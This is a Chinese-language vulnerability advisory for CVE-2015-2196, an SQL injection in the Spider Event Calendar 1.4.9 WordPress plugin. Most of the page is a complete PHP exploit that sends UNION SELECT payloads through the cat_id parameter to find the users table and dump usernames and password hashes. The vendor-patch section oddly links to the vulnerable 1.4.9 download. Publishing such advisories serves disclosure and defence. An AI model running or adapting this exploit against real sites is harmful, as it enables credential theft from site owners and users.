WordPress Webdorado Spider Event Calendar sql注入漏洞
发表日期:2015-03-17 10:35:31
WordPress Webdorado Spider Event Calendar sql注入漏洞
CVE-ID:CVE-2015-2196
发布日期:2015-03-05
更新日期:2015-03-13
受影响系统:
Webdorado Spider Event Calendar 1.4.9
详细信息:
Webdorado Spider Event Calendar是WordPress插件,可以列举及管理事件。
Spider Event Calendar 1.4.9版本中存在sql注入漏洞,此漏洞是通过wp-admin/admin-ajax.php的spiderbigcalendar_month操作中cat_id参数利用的。成功利用后远程攻击者可执行任意sql命令。
来源:
Mateusz Lach
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it\'s PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it\'s PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection
*/
define(\'FETCH_PREFIX_URL\', \'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0\');
define(\'FETCH_USERS_URL\', \'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0\');
define(\'FAKE_ID_TO_SEARCH\', 12345677654321);
define(\'PATTERN_TO_SEARCH\', \'ev_ids=\'.FAKE_ID_TO_SEARCH);
define(\'PATTERN_TO_SEARCH_USERS\', \'#!#!#!#\');
define(\'ROW_SEPARATOR\', \',\');
define(\'FIELD_SEPARATOR\', \'##\');
$server = $_GET[\'SRV\'];
if (empty($server))
{
echo \'Please put server (without protocol) name in SRV GET variable!\';
}
else
{
$fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
$prefixCurl = curl_init($fullURL);
curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($prefixCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
preg_match(\'/####[a-zA-Z\\_0-9]*####/\', $result, $tableNames);
$tableName = str_replace(\'####\', \'\', $tableNames[0]);
echo \'tableName: \'.$tableName.\'<BR/>\';
$fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
$usersCurl = curl_init($fullURL);
curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($usersCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
$from = stripos($result, PATTERN_TO_SEARCH_USERS);
$to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
$result = substr($result, $from, $to-$from);
echo \'<table><tr><td>\'.str_replace(FIELD_SEPARATOR, \'</td><td>\', str_replace(ROW_SEPARATOR, \'</td></tr><tr><td>\', str_replace(PATTERN_TO_SEARCH_USERS, \'\', $result))).\'</td></tr></table>\';
}
else
{
echo \'Table name fetched, but not users - try to rewrite exploit :-(\';
}
}
else
{
echo \'NOT vulnerable :-(\';
}
}
解决办法:
厂商补丁:
Webdorado
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip